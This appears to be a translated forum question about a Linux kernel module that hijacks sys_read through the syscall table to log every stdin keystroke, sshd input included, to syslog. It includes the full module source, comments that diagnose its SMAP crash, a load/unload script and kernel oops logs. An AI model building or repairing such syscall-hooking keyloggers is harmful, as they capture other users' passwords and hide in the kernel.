LKM崩溃取决于硬件吗?

时间:2019-06-13 10:34:28

标签: c linux-kernel hardware kernel-module

我的LKM劫持了stdin / sshd输入:https://pastebin.com/RChpbt9G

# uname -a
Linux kali 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux

我在两台计算机上都使用最新的 Kali 2019.2:https://www.kali.org/downloads/

  • 第一台计算机i5-2500K-好的。
  • 第二台计算机i7-6700HQ(硬件名称:Acer NG-G9-592-52LP / Mustang_SLS,BIOS V1.05 03/01/2016)-gaming laptop-崩溃...

Makefile:

# Out-of-tree kbuild Makefile: builds against the headers of the *running*
# kernel, so the resulting .ko is tied to exactly that kernel version.
CURRENT = $(shell uname -r)
KDIR = /lib/modules/$(CURRENT)/build
PWD = $(shell pwd)

# kbuild compiles $(TARGET).c into $(TARGET).ko.
TARGET = hacked_read
obj-m := $(TARGET).o

default:
    $(MAKE) -C $(KDIR) M=$(PWD) modules

# Removes kbuild intermediates by glob.  The built *.ko itself is not in the
# list, so a stale module survives `make clean`; `$(MAKE) -C $(KDIR) M=$(PWD) clean`
# would cover everything kbuild generates.
clean:
    @rm -f *.o .*.cmd .*.flags *.mod.c *.order
    @rm -f .*.*.cmd *.symvers *~ *.*~ TODO.*
    @rm -fR .tmp*
    @rm -rf .tmp_versions

LKM代码:

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/syscalls.h>
#include <linux/version.h>
#include <linux/unistd.h>
#include <linux/time.h>
#include <linux/preempt.h>
#include <linux/delay.h>
#include <linux/cred.h>
#include <linux/sched.h>

#include <asm/uaccess.h>
#include <asm/paravirt.h>
#include <asm-generic/bug.h>
#include <asm/segment.h>
#include <asm/atomic.h>

/* Size of pids[].  task_pid_nr() is used as an index into it with no bounds
 * check, so any pid >= PID_MAX (possible when pid_max has been raised above the
 * 32768 default) writes past the array. */
#define PID_MAX 32768

#define MODULE_NAME "hacked_read"

/* dbg() expands to a read of `debug`, which is declared nowhere in this file;
 * it compiles only because the macro is never used. */
#define dbg( format, arg... )  do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
#define err( format, arg... )  pr_err(  MODULE_NAME ": " format, ## arg )
#define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
#define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )

MODULE_DESCRIPTION( MODULE_NAME );
MODULE_VERSION( "0.2" );
MODULE_LICENSE( "GPL" );
MODULE_AUTHOR( "module author <mail@domain.com>" );


/* Serialises the CR0.WP toggling and syscall-table writes in init/exit. */
static DEFINE_SPINLOCK( mLock );
/* Original sys_read entry, saved by init and restored by exit. */
static unsigned long ( *original_read )  ( const struct pt_regs *regs );
/* sys_call_table as resolved by find_sym(); may be NULL.  Nothing outside this
 * file uses it, so it should be static. */
void **sct;
/* irq flags for spin_lock_irqsave().  Kept in a file-scope variable shared by
 * every caller; the kernel convention is one local per lock scope. */
static unsigned long flags; // irq flags

/* Number of tasks currently executing inside hacked_read_test(). */
static atomic_t LOCK_NUMBER_ATOM        = ATOMIC_INIT(0);
/* Snapshot of LOCK_NUMBER_ATOM taken by the exit wait loop. */
static unsigned long long LOCK_NUMBER_ATOM_VAL;
/* pids[pid] is true while that pid is inside hacked_read_test(); see PID_MAX. */
static bool pids[ PID_MAX ];

/*
 * Clears CR0.WP (bit 16; the mask 0xfffffffffffeffff keeps every other bit)
 * on the current CPU only, making read-only kernel pages writable from ring 0.
 * rax is saved/restored by hand because the asm statement declares no
 * clobbers; it also declares no "memory" clobber, so the compiler is free to
 * reorder surrounding memory accesses across it.
 */
static inline void rw_enable( void ) {
    asm volatile ( "pushq %rax \n"
        "movq %cr0, %rax \n"
        "andq $0xfffffffffffeffff, %rax \n"
        "movq %rax, %cr0 \n"
        "popq %rax " );
}

/*
 * Returns the current CPU's CR0 value.  Used by init/exit to save CR0 before
 * rw_enable() so that rw_disable() can put the original value (WP included)
 * back.
 */
static inline uint64_t getcr0(void) {
    register uint64_t ret = 0;
    asm volatile (
        "movq %%cr0, %0\n"
        :"=r"(ret)
    );
    return ret;
}

/*
 * Writes val into CR0 on the current CPU.  With the value captured by getcr0()
 * this re-enables write protection that rw_enable() cleared.  Like rw_enable()
 * it declares no "memory" clobber.
 */
static inline void rw_disable( register uint64_t val ) {
    asm volatile(
        "movq %0, %%cr0\n"
        :
        :"r"(val)
    );
}

/*
 * Resolves a kernel symbol by exact name through kallsyms_on_each_symbol().
 *
 * Returns the symbol's address, or NULL when nothing matched on the first
 * call.  faddr is static, so on a later call a miss would hand back the
 * previous hit rather than NULL.  The caller (hacked_read_init) never checks
 * the result.
 *
 * symb_fn is a GCC nested function (not standard C).  It only touches its own
 * parameters and the static faddr, so no stack trampoline is needed; returning
 * 1 stops the symbol walk at the first match.
 */
static void* find_sym( const char *sym ) {
    static unsigned long faddr = 0; // static !!!
    // ----------- nested functions are a GCC extension ---------
    int symb_fn( void* data, const char* sym, struct module* mod, unsigned long addr ) {
        if( 0 == strcmp( (char*)data, sym ) ) {
            faddr = addr;
            return 1;
        } else return 0;
    };// --------------------------------------------------------
    kallsyms_on_each_symbol( symb_fn, (void*)sym );
    return (void*)faddr;
}

/*
 * Replacement for sys_read installed in the syscall table by hacked_read_init().
 * regs carries the user's syscall arguments (x86-64 ABI: rdi = fd, rsi = buf).
 * It runs the saved original read and, for fd 0, writes the first byte of the
 * user buffer into the kernel log — i.e. every byte read from stdin by any
 * process lands in syslog.  Returns whatever the original read returned.
 *
 * Defects visible from the oops on this page:
 *  - buf is a user-space pointer and is dereferenced directly by strlen() and
 *    buf[0].  The crash (RIP = hacked_read_test+0x42, CR2 = a 0x00007fff...
 *    user address, faulting instruction `movzbl (%rbp)` with rbp = buf) is that
 *    access.  CR4 in the oops is 0x3606e0, i.e. SMEP and SMAP are enabled;
 *    with SMAP the CPU faults on any implicit supervisor access to user pages
 *    that is not done through the kernel's user-access helpers.  The Sandy
 *    Bridge i5-2500K predates SMAP, which is why the same code appeared to
 *    work there.  Even without SMAP the buffer need not be NUL-terminated or
 *    mapped at all.
 *  - r is never checked.  A failed read returns -errno (oops #3 shows
 *    RAX = 0xfffffffffffffe00, -ERESTARTSYS) and buf is still dereferenced.
 *  - pids[] is indexed by task_pid_nr() with no check against PID_MAX.
 */
static unsigned long hacked_read_test( const struct pt_regs *regs ) {
    unsigned long r = 1;
    unsigned int fd = regs->di;
    char *buf = (char*) regs->si;
    atomic_inc( &LOCK_NUMBER_ATOM );
    pids[ task_pid_nr( current ) ] = true;
    r = original_read( regs );
    if ( fd == 0 ) { // fd == 0 --> stdin (sh, sshd)
        if ( strlen( buf ) > 0 )
            info( "hacked_read: %c\n", buf[ 0 ] );
    }
    atomic_dec( &LOCK_NUMBER_ATOM );
    pids[ task_pid_nr( current ) ] = false;
    return r;
}

/*
 * Module entry point: looks up sys_call_table through kallsyms, saves the
 * sys_read entry and overwrites it with hacked_read_test().  Always returns 0.
 *
 * Notes:
 *  - find_sym() can return NULL; the result is dereferenced without a check
 *    and the function still reports success.
 *  - for_each_present_cpu() only iterates CPU ids; the body runs on whichever
 *    CPU init happens to be on and `cpu` is never used, so the (global) table
 *    entry is rewritten once per present CPU from a single CPU.  CR0.WP is
 *    per-CPU, the table write is not, so one iteration does the whole job.
 *  - `flags` here is the file-scope variable, not a local.
 *  - Loading this module taints the kernel ("O" in the log on this page), and a
 *    sys_call_table slot pointing into module memory is what kernel integrity
 *    checkers compare against kallsyms.
 */
int hacked_read_init( void ) {
    register uint64_t cr0;
    int cpu;
    sct = find_sym( "sys_call_table" );
    original_read = (void *)sct[ __NR_read ];
    for_each_present_cpu( cpu ) {
        spin_lock_irqsave( &mLock, flags );
        cr0 = getcr0( );
        rw_enable( );
        sct[ __NR_read ] = hacked_read_test;
        rw_disable( cr0 );
        spin_unlock_irqrestore( &mLock, flags );
    }
    info( "Module was loaded\n" );
    return 0;
}

/*
 * Module exit: puts the saved sys_read pointer back, then polls every 5 s
 * until the in-flight counter reaches zero, logging the pids still inside the
 * hook meanwhile.
 *
 * Notes:
 *  - The restore loop has the same shape as in init: for_each_present_cpu()
 *    does not run the body on each CPU, `cpu` is unused, and `flags` is the
 *    shared file-scope variable.
 *  - A task that has already fetched the hooked pointer but has not yet
 *    executed atomic_inc() is invisible to the counter, so the wait cannot
 *    fully close the window before the module text is freed.
 *  - A task blocked inside original_read() on fd 0 (a shell waiting for a
 *    keypress) keeps the counter non-zero, so rmmod blocks for as long as that
 *    read does.
 *  - LOCK_NUMBER_ATOM_VAL is unsigned long long but printed with %lld.
 */
void hacked_read_exit( void ) {
    register uint64_t cr0;
    int cpu;
    unsigned int i;
    for_each_present_cpu( cpu ) {
        spin_lock_irqsave( &mLock, flags );
        cr0 = getcr0( );
        rw_enable( );
        sct[__NR_read] = original_read;
        rw_disable( cr0 );
        spin_unlock_irqrestore( &mLock, flags );
    }
    LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
    while ( LOCK_NUMBER_ATOM_VAL != 0 ) {
        info( "Locked. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL );
        for( i = 0; i < PID_MAX; i++ ) {
            if ( pids[ i ] ) {
                info( "Locked. pid = %d\n", i );
            }
        }
        msleep( 5000 );
        LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
    }
    info( "Open. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL);
    info( "Module was unloaded\n" );
}

/* Register the module entry/exit points with the kernel. */
module_init( hacked_read_init );
module_exit( hacked_read_exit );

当我在 i5-2500K 上使用它时一切正常,键盘的每次输入都能正常出现在 /var/log/syslog 中。但是,当我在 i7-6700HQ 上加载此模块时,它会失控并卡住键盘,因此我用以下方式进行测试:

#!/bin/bash
# Test driver: copy the freshly built module into the running kernel's module
# directory (the kernel version is hard-coded and must match `uname -r`),
# refresh the dependency index, load the module, wait 10 s, unload it.
# None of the steps is error-checked (no `set -e`), so a failed cp or modprobe
# still lets the remaining commands run; rmmod itself can block for as long as
# hacked_read_exit() is waiting on in-flight readers.
cp -v /mnt/opt2/usr_src/programming/cpp/hacked_read/hacked_read.ko /lib/modules/4.19.0-kali4-amd64/
depmod
modprobe hacked_read
sleep 10
rmmod hacked_read

我在 /var/log/syslog 中看到了这个:https://pastebin.com/D7YS3z0c

Jun 13 16:00:24 localhost kernel: [ 1624.899161] hacked_read: loading out-of-tree module taints kernel.
Jun 13 16:00:24 localhost kernel: [ 1624.899538] hacked_read: Module was loaded
Jun 13 16:00:24 localhost systemd[1]: atopacct.service: Main process exited, code=killed, status=9/KILL
Jun 13 16:00:24 localhost systemd[1]: atopacct.service: Failed with result 'signal'.
Jun 13 16:00:24 localhost kernel: [ 1624.906589] BUG: unable to handle kernel paging request at 00007fffc3497560
Jun 13 16:00:24 localhost kernel: [ 1624.906592] PGD 80000002dcbe3067 P4D 80000002dcbe3067 PUD 2e3bab067 PMD 2df01c067 PTE 8000000450ae7867
Jun 13 16:00:24 localhost kernel: [ 1624.906597] Oops: 0001 [#1] SMP PTI
Jun 13 16:00:24 localhost kernel: [ 1624.906599] CPU: 4 PID: 15874 Comm: atopacctd Tainted: G           O      4.19.0-kali4-amd64 #1 Debian 4.19.28-2kali1
Jun 13 16:00:24 localhost kernel: [ 1624.906601] Hardware name: Acer NG-G9-592-52LP/Mustang_SLS, BIOS V1.05 03/01/2016
Jun 13 16:00:24 localhost kernel: [ 1624.906604] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:24 localhost kernel: [ 1624.906605] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:24 localhost kernel: [ 1624.906607] RSP: 0018:ffff9f1dc5f1ff20 EFLAGS: 00010246
Jun 13 16:00:24 localhost kernel: [ 1624.906609] RAX: 0000000000000080 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906610] RDX: 0000000000000000 RSI: ffff8eb7e3c333a0 RDI: 0000000000000001
Jun 13 16:00:24 localhost kernel: [ 1624.906611] RBP: 00007fffc3497560 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906612] R10: ffff9f1dc5f1feb0 R11: 0000000000000000 R12: 0000000000000080
Jun 13 16:00:24 localhost kernel: [ 1624.906613] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906615] FS:  00007f28ab3d6540(0000) GS:ffff8eb7f1b00000(0000) knlGS:0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906617] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:24 localhost kernel: [ 1624.906618] CR2: 00007fffc3497560 CR3: 00000002f2e56002 CR4: 00000000003606e0
Jun 13 16:00:24 localhost kernel: [ 1624.906619] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906621] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:24 localhost kernel: [ 1624.906622] Call Trace:
Jun 13 16:00:24 localhost kernel: [ 1624.906627]  do_syscall_64+0x53/0x100
Jun 13 16:00:24 localhost kernel: [ 1624.906630]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
Jun 13 16:00:24 localhost kernel: [ 1624.906632] RIP: 0033:0x7f28ab2fe761
Jun 13 16:00:24 localhost kernel: [ 1624.906634] Code: fe ff ff 50 48 8d 3d fe cd 09 00 e8 79 04 02 00 66 0f 1f 84 00 00 00 00 00 48 8d 05 99 5f 0d 00 8b 00 85 c0 75 13 31 c0 0f 05 <48> 3d 00 f0 ff ff 77 57 c3 66 0f 1f 44 00 00 41 54 49 89 d4 55 48
Jun 13 16:00:24 localhost kernel: [ 1624.906635] RSP: 002b:00007fffc3497528 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906637] RAX: ffffffffffffffda RBX: 0000000000000009 RCX: 00007f28ab2fe761
Jun 13 16:00:24 localhost kernel: [ 1624.906638] RDX: 0000000000003e80 RSI: 00007fffc3497560 RDI: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906639] RBP: 00007fffc3497560 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906641] R10: 0000000000000040 R11: 0000000000000246 R12: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906642] R13: 00007fffc3497550 R14: 00007fffc349b6c0 R15: 00007fffc349b478
Jun 13 16:00:24 localhost kernel: [ 1624.906643] Modules linked in: hacked_read(O) ctr ccm nfnetlink_queue xt_REDIRECT nf_log_ipv4 nf_log_common xt_LOG ipt_REJECT nf_reject_ipv4 pktcdvd appletalk psnap llc ax25 xt_NFQUEUE xt_owner xt_tcpudp nft_counter xt_state xt_conntrack nft_compat nft_chain_route_ipv4 nft_chain_nat_ipv4 nf_nat_ipv4 nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 libcrc32c nf_tables nfnetlink dm_crypt algif_skcipher af_alg dm_mod ext4 mbcache jbd2 crc32c_generic fscrypto ecb fuse arc4 ath10k_pci ath10k_core btusb ath btrtl btbcm snd_hda_codec_hdmi btintel mac80211 intel_rapl bluetooth x86_pkg_temp_thermal intel_powerclamp uvcvideo coretemp snd_hda_codec_realtek cfg80211 kvm_intel videobuf2_vmalloc videobuf2_memops videobuf2_v4l2 videobuf2_common videodev media kvm drbg snd_hda_codec_generic ansi_cprng ecdh_generic
Jun 13 16:00:24 localhost kernel: [ 1624.906676]  crc16 hid_a4tech snd_hda_intel joydev snd_hda_codec irqbypass snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore tpm_crb sg intel_cstate tpm_tis tpm_tis_core mei_me intel_uncore tpm rng_core hid_multitouch mei acer_wmi intel_rapl_perf iTCO_wdt sparse_keymap rfkill serio_raw pcspkr iTCO_vendor_support wmi_bmof idma64 intel_pch_thermal evdev pcc_cpufreq ac acpi_pad battery binfmt_misc ip_tables x_tables autofs4 squashfs zstd_decompress xxhash loop overlay nls_utf8 isofs usbhid sr_mod cdrom sd_mod uas usb_storage hid_generic crct10dif_pclmul crc32_pclmul crc32c_intel ghash_clmulni_intel pcbc nouveau i915 mxm_wmi i2c_algo_bit ahci aesni_intel intel_lpss_pci xhci_pci drm_kms_helper ttm aes_x86_64 libahci xhci_hcd crypto_simd libata cryptd glue_helper alx psmouse i2c_i801 mdio scsi_mod
Jun 13 16:00:24 localhost kernel: [ 1624.906712]  intel_lpss usbcore drm i2c_hid usb_common thermal hid wmi video button
Jun 13 16:00:24 localhost kernel: [ 1624.906718] CR2: 00007fffc3497560
Jun 13 16:00:24 localhost kernel: [ 1624.906719] ---[ end trace a09f35b7d83f68d8 ]---
Jun 13 16:00:24 localhost kernel: [ 1624.906722] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:24 localhost kernel: [ 1624.906723] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:24 localhost kernel: [ 1624.906725] RSP: 0018:ffff9f1dc5f1ff20 EFLAGS: 00010246
Jun 13 16:00:24 localhost kernel: [ 1624.906726] RAX: 0000000000000080 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906727] RDX: 0000000000000000 RSI: ffff8eb7e3c333a0 RDI: 0000000000000001
Jun 13 16:00:24 localhost kernel: [ 1624.906728] RBP: 00007fffc3497560 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906730] R10: ffff9f1dc5f1feb0 R11: 0000000000000000 R12: 0000000000000080
Jun 13 16:00:24 localhost kernel: [ 1624.906731] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906732] FS:  00007f28ab3d6540(0000) GS:ffff8eb7f1b00000(0000) knlGS:0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906734] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:24 localhost kernel: [ 1624.906735] CR2: 00007fffc3497560 CR3: 00000002f2e56002 CR4: 00000000003606e0
Jun 13 16:00:24 localhost kernel: [ 1624.906736] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:24 localhost kernel: [ 1624.906737] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:25 localhost kernel: [ 1625.433687] BUG: unable to handle kernel paging request at 0000556becd76d67
Jun 13 16:00:25 localhost kernel: [ 1625.433695] PGD 80000002e39d0067 P4D 80000002e39d0067 PUD 2e332d067 PMD 2d13bc067 PTE 80000002b4f9a867
Jun 13 16:00:25 localhost kernel: [ 1625.433708] Oops: 0001 [#2] SMP PTI
Jun 13 16:00:25 localhost kernel: [ 1625.433716] CPU: 3 PID: 21500 Comm: grep Tainted: G      D    O      4.19.0-kali4-amd64 #1 Debian 4.19.28-2kali1
Jun 13 16:00:25 localhost kernel: [ 1625.433719] Hardware name: Acer NG-G9-592-52LP/Mustang_SLS, BIOS V1.05 03/01/2016
Jun 13 16:00:25 localhost kernel: [ 1625.433729] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:25 localhost kernel: [ 1625.433734] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:25 localhost kernel: [ 1625.433738] RSP: 0018:ffff9f1dc5f4ff20 EFLAGS: 00010246
Jun 13 16:00:25 localhost kernel: [ 1625.433744] RAX: 00000000000000d8 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433747] RDX: 0000000000000000 RSI: ffff8eb7ef52c020 RDI: 0000000000000001
Jun 13 16:00:25 localhost kernel: [ 1625.433751] RBP: 0000556becd76d67 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433755] R10: ffff9f1dc5f4feb0 R11: 0000000000000001 R12: 00000000000000d8
Jun 13 16:00:25 localhost kernel: [ 1625.433758] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433763] FS:  00007f578746fb80(0000) GS:ffff8eb7f1ac0000(0000) knlGS:0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433767] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:25 localhost kernel: [ 1625.433771] CR2: 0000556becd76d67 CR3: 00000002b792c006 CR4: 00000000003606e0
Jun 13 16:00:25 localhost kernel: [ 1625.433775] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433779] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:25 localhost kernel: [ 1625.433782] Call Trace:
Jun 13 16:00:25 localhost kernel: [ 1625.433795]  do_syscall_64+0x53/0x100
Jun 13 16:00:25 localhost kernel: [ 1625.433804]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
Jun 13 16:00:25 localhost kernel: [ 1625.433810] RIP: 0033:0x7f578757c761
Jun 13 16:00:25 localhost kernel: [ 1625.433815] Code: fe ff ff 50 48 8d 3d fe cd 09 00 e8 79 04 02 00 66 0f 1f 84 00 00 00 00 00 48 8d 05 99 5f 0d 00 8b 00 85 c0 75 13 31 c0 0f 05 <48> 3d 00 f0 ff ff 77 57 c3 66 0f 1f 44 00 00 41 54 49 89 d4 55 48
Jun 13 16:00:25 localhost kernel: [ 1625.433819] RSP: 002b:00007ffd300aaaa8 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433824] RAX: ffffffffffffffda RBX: 000000000000e000 RCX: 00007f578757c761
Jun 13 16:00:25 localhost kernel: [ 1625.433828] RDX: 000000000000e000 RSI: 0000556becd76d67 RDI: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433832] RBP: 000000000000e000 R08: 000000000000000f R09: 0000000000019008
Jun 13 16:00:25 localhost kernel: [ 1625.433835] R10: 0000000000000004 R11: 0000000000000246 R12: 0000556becd76d67
Jun 13 16:00:25 localhost kernel: [ 1625.433839] R13: 0000000000000000 R14: 0000556becd6c800 R15: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.433843] Modules linked in: hacked_read(O) ctr ccm nfnetlink_queue xt_REDIRECT nf_log_ipv4 nf_log_common xt_LOG ipt_REJECT nf_reject_ipv4 pktcdvd appletalk psnap llc ax25 xt_NFQUEUE xt_owner xt_tcpudp nft_counter xt_state xt_conntrack nft_compat nft_chain_route_ipv4 nft_chain_nat_ipv4 nf_nat_ipv4 nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 libcrc32c nf_tables nfnetlink dm_crypt algif_skcipher af_alg dm_mod ext4 mbcache jbd2 crc32c_generic fscrypto ecb fuse arc4 ath10k_pci ath10k_core btusb ath btrtl btbcm snd_hda_codec_hdmi btintel mac80211 intel_rapl bluetooth x86_pkg_temp_thermal intel_powerclamp uvcvideo coretemp snd_hda_codec_realtek cfg80211 kvm_intel videobuf2_vmalloc videobuf2_memops videobuf2_v4l2 videobuf2_common videodev media kvm drbg snd_hda_codec_generic ansi_cprng ecdh_generic
Jun 13 16:00:25 localhost kernel: [ 1625.433931]  crc16 hid_a4tech snd_hda_intel joydev snd_hda_codec irqbypass snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore tpm_crb sg intel_cstate tpm_tis tpm_tis_core mei_me intel_uncore tpm rng_core hid_multitouch mei acer_wmi intel_rapl_perf iTCO_wdt sparse_keymap rfkill serio_raw pcspkr iTCO_vendor_support wmi_bmof idma64 intel_pch_thermal evdev pcc_cpufreq ac acpi_pad battery binfmt_misc ip_tables x_tables autofs4 squashfs zstd_decompress xxhash loop overlay nls_utf8 isofs usbhid sr_mod cdrom sd_mod uas usb_storage hid_generic crct10dif_pclmul crc32_pclmul crc32c_intel ghash_clmulni_intel pcbc nouveau i915 mxm_wmi i2c_algo_bit ahci aesni_intel intel_lpss_pci xhci_pci drm_kms_helper ttm aes_x86_64 libahci xhci_hcd crypto_simd libata cryptd glue_helper alx psmouse i2c_i801 mdio scsi_mod
Jun 13 16:00:25 localhost kernel: [ 1625.434030]  intel_lpss usbcore drm i2c_hid usb_common thermal hid wmi video button
Jun 13 16:00:25 localhost kernel: [ 1625.434046] CR2: 0000556becd76d67
Jun 13 16:00:25 localhost kernel: [ 1625.434051] ---[ end trace a09f35b7d83f68d9 ]---
Jun 13 16:00:25 localhost kernel: [ 1625.434058] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:25 localhost kernel: [ 1625.434063] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:25 localhost kernel: [ 1625.434066] RSP: 0018:ffff9f1dc5f1ff20 EFLAGS: 00010246
Jun 13 16:00:25 localhost kernel: [ 1625.434071] RAX: 0000000000000080 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434074] RDX: 0000000000000000 RSI: ffff8eb7e3c333a0 RDI: 0000000000000001
Jun 13 16:00:25 localhost kernel: [ 1625.434078] RBP: 00007fffc3497560 R08: 0000000000000000 R09: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434081] R10: ffff9f1dc5f1feb0 R11: 0000000000000000 R12: 0000000000000080
Jun 13 16:00:25 localhost kernel: [ 1625.434085] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434090] FS:  00007f578746fb80(0000) GS:ffff8eb7f1ac0000(0000) knlGS:0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434093] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:25 localhost kernel: [ 1625.434097] CR2: 0000556becd76d67 CR3: 00000002b792c006 CR4: 00000000003606e0
Jun 13 16:00:25 localhost kernel: [ 1625.434101] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:25 localhost kernel: [ 1625.434105] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:35 localhost kernel: [ 1635.419417] BUG: unable to handle kernel paging request at 00007ffd57fa5d6f
Jun 13 16:00:35 localhost kernel: [ 1635.419427] PGD 80000002dc983067 P4D 80000002dc983067 PUD 2d80bd067 PMD 2f3d2d067 PTE 80000003254c4867
Jun 13 16:00:35 localhost kernel: [ 1635.419442] Oops: 0001 [#3] SMP PTI
Jun 13 16:00:35 localhost kernel: [ 1635.419450] CPU: 4 PID: 21549 Comm: atop Tainted: G      D    O      4.19.0-kali4-amd64 #1 Debian 4.19.28-2kali1
Jun 13 16:00:35 localhost kernel: [ 1635.419454] Hardware name: Acer NG-G9-592-52LP/Mustang_SLS, BIOS V1.05 03/01/2016
Jun 13 16:00:35 localhost kernel: [ 1635.419464] RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
Jun 13 16:00:35 localhost kernel: [ 1635.419470] Code: 65 48 8b 04 25 40 5c 01 00 48 63 80 c8 04 00 00 c6 80 60 73 3b c1 01 48 8b 05 42 a3 00 00 e8 c5 df e4 e9 49 89 c4 85 db 75 0c <0f> b6 45 00 84 c0 0f 85 de 00 00 00 f0 ff 0d 13 a3 00 00 65 48 8b
Jun 13 16:00:35 localhost kernel: [ 1635.419475] RSP: 0018:ffff9f1dc6437f20 EFLAGS: 00010246
Jun 13 16:00:35 localhost kernel: [ 1635.419481] RAX: fffffffffffffe00 RBX: 0000000000000000 RCX: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419485] RDX: 0000000000000000 RSI: 0000000000000257 RDI: ffff8eb632d9fc28
Jun 13 16:00:35 localhost kernel: [ 1635.419489] RBP: 00007ffd57fa5d6f R08: 0000714c40000000 R09: 0000000000025d19
Jun 13 16:00:35 localhost kernel: [ 1635.419494] R10: 0000000000026611 R11: 0000017cc5933f1e R12: fffffffffffffe00
Jun 13 16:00:35 localhost kernel: [ 1635.419497] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419503] FS:  00007fa66b6b9d40(0000) GS:ffff8eb7f1b00000(0000) knlGS:0000000000000000
